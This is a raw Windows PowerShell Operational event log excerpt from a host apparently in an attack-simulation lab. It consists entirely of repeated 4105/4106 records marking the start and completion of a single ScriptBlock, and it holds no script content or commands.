RecordNumber=1472324
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472323
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472322
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472321
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472320
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472319
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472318
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472317
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472316
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472315
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472314
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472313
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472312
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472311
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472310
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472309
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472308
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472307
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472306
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472305
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472304
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472303
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472302
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472301
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472300
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472299
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472298
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472297
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472296
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472295
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472294
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472293
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472292
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472291
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472290
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472289
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472288
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472287
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472286
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472285
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472284
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472283
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472282
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472281
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472280
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472279
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472278
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472277
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472276
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472275
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472274
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472273
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472272
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472271
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472270
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
